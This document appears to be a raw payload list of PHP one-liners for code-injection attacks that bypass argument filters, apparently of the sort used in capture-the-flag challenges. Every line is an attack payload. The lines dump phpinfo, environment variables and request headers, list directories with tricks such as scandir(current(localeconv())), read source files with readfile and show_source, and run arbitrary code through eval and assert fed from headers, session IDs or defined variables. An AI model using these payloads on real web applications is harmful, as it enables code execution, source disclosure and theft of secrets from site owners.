phpinfo();
print(phpinfo());
printf(phpinfo());
echo(phpinfo());
print_r(phpinfo());
var_dump(phpinfo());
var_export(phpinfo());
debug_zval_dump(phpinfo());
print(implode(phpinfo()));
printf(implode(phpinfo()));
echo(implode(phpinfo()));
print(getenv(phpinfo()));
printf(getenv(phpinfo()));
echo(getenv(phpinfo()));
print_r(getenv(phpinfo()));
var_dump(getenv(phpinfo()));
var_export(getenv(phpinfo()));
debug_zval_dump(getenv(phpinfo()));
print(implode(getenv(phpinfo())));
printf(implode(getenv(phpinfo())));
echo(implode(getenv(phpinfo())));
print_r(getenv());
var_dump(getenv());
var_export(getenv());
debug_zval_dump(getenv());
print(implode(getenv()));
printf(implode(getenv()));
echo(implode(getenv()));
print_r(get_defined_vars());
var_dump(get_defined_vars());
var_export(get_defined_vars());
debug_zval_dump(get_defined_vars());
print(implode(get_defined_vars()));
printf(implode(get_defined_vars()));
echo(implode(get_defined_vars()));
eval(end(current(get_defined_vars())));&zzz=phpinfo();
assert(end(current(get_defined_vars())));&zzz=phpinfo();
print(getcwd());
printf(getcwd());
echo(getcwd());
print_r(getcwd());
var_dump(getcwd());
var_export(getcwd());
debug_zval_dump(getcwd());
print(implode(getcwd()));
printf(implode(getcwd()));
echo(implode(getcwd()));
print_r(scandir(current(localeconv())));
var_dump(scandir(current(localeconv())));
var_export(scandir(current(localeconv())));
debug_zval_dump(scandir(current(localeconv())));
print(implode(scandir(current(localeconv()))));
printf(implode(scandir(current(localeconv()))));
echo(implode(scandir(current(localeconv()))));
print_r(scandir(getcwd()));
var_dump(scandir(getcwd()));
var_export(scandir(getcwd()));
debug_zval_dump(scandir(getcwd()));
print(implode(scandir(getcwd())));
printf(implode(scandir(getcwd())));
echo(implode(scandir(getcwd())));
print_r(scandir(dirname(getcwd())));
var_dump(scandir(dirname(getcwd())));
var_export(scandir(dirname(getcwd())));
debug_zval_dump(scandir(dirname(getcwd())));
print(implode(scandir(dirname(getcwd()))));
printf(implode(scandir(dirname(getcwd()))));
echo(implode(scandir(dirname(getcwd()))));
print_r(sys_get_temp_dir());
var_dump(sys_get_temp_dir());
var_export(sys_get_temp_dir());
debug_zval_dump(sys_get_temp_dir());
print(implode(sys_get_temp_dir()));
printf(implode(sys_get_temp_dir()));
echo(implode(sys_get_temp_dir()));
print_r(getallheaders());
var_dump(getallheaders());
var_export(getallheaders());
debug_zval_dump(getallheaders());
print(implode(getallheaders()));
printf(implode(getallheaders()));
echo(implode(getallheaders()));
eval(next(getallheaders()));
assert(next(getallheaders()));
print_r(implode(getallheaders()));
var_dump(implode(getallheaders()));
var_export(implode(getallheaders()));
debug_zval_dump(implode(getallheaders()));
print(implode(implode(getallheaders())));
printf(implode(implode(getallheaders())));
echo(implode(implode(getallheaders())));
eval(implode(getallheaders()));
assert(implode(getallheaders()));
print_r(session_id(session_start()));
var_dump(session_id(session_start()));
var_export(session_id(session_start()));
debug_zval_dump(session_id(session_start()));
print(implode(session_id(session_start())));
printf(implode(session_id(session_start())));
echo(implode(session_id(session_start())));
eval(hex2bin(session_id(session_start())));
assert(hex2bin(session_id(session_start())));
print_r(file_get_contents(session_id(session_start())));
var_dump(file_get_contents(session_id(session_start())));
var_export(file_get_contents(session_id(session_start())));
debug_zval_dump(file_get_contents(session_id(session_start())));
print(implode(file_get_contents(session_id(session_start()))));
printf(implode(file_get_contents(session_id(session_start()))));
echo(implode(file_get_contents(session_id(session_start()))));
highlight_file(session_id(session_start()));
readfile(session_id(session_start()));
print_r(file(session_id(session_start())));
print(file_get_contents(session_id(session_start())));
show_source(session_id(session_start()));
highlight_file(array_rand(array_flip(scandir(current(localeconv())))));
readfile(array_rand(array_flip(scandir(current(localeconv())))));
print_r(file(array_rand(array_flip(scandir(current(localeconv()))))));
print(file_get_contents(array_rand(array_flip(scandir(current(localeconv()))))));
show_source(array_rand(array_flip(scandir(current(localeconv())))));
highlight_file(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd())))))));
readfile(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd())))))));
print_r(file(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd()))))))));
print(file_get_contents(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd()))))))));
show_source(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd())))))));
highlight_file(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(getcwd())))))))))));
readfile(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(getcwd())))))))))));
print_r(file(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(getcwd()))))))))))));
print(file_get_contents(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(getcwd()))))))))))));
show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(getcwd())))))))))));
highlight_file(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))));
readfile(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))));
print_r(file(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion()))))))))))))))));
print(file_get_contents(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion()))))))))))))))));
show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))));
print_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));
var_dump(scandir(chr(ord(strrev(crypt(serialize(array())))))));
var_export(scandir(chr(ord(strrev(crypt(serialize(array())))))));
debug_zval_dump(scandir(chr(ord(strrev(crypt(serialize(array())))))));
print(implode(scandir(chr(ord(strrev(crypt(serialize(array()))))))));
printf(implode(scandir(chr(ord(strrev(crypt(serialize(array()))))))));
echo(implode(scandir(chr(ord(strrev(crypt(serialize(array()))))))));
highlight_file(array_rand(array_flip(scandir(dirname(chdir(chr(ord(strrev(crypt(serialize(array())))))))))));
readfile(array_rand(array_flip(scandir(dirname(chdir(chr(ord(strrev(crypt(serialize(array())))))))))));
print_r(file(array_rand(array_flip(scandir(dirname(chdir(chr(ord(strrev(crypt(serialize(array()))))))))))));
print(file_get_contents(array_rand(array_flip(scandir(dirname(chdir(chr(ord(strrev(crypt(serialize(array()))))))))))));
show_source(array_rand(array_flip(scandir(dirname(chdir(chr(ord(strrev(crypt(serialize(array())))))))))));
eval(array_pop(next(get_defined_vars())));
assert(array_pop(next(get_defined_vars())));
highlight_file(next(array_reverse(scandir(pos(localeconv())))));
readfile(next(array_reverse(scandir(pos(localeconv())))));
print_r(file(next(array_reverse(scandir(pos(localeconv()))))));
print(file_get_contents(next(array_reverse(scandir(pos(localeconv()))))));
show_source(next(array_reverse(scandir(pos(localeconv())))));
highlight_file(next(array_reverse(scandir(getcwd()))));
readfile(next(array_reverse(scandir(getcwd()))));
print_r(file(next(array_reverse(scandir(getcwd())))));
print(file_get_contents(next(array_reverse(scandir(getcwd())))));
show_source(next(array_reverse(scandir(getcwd()))));
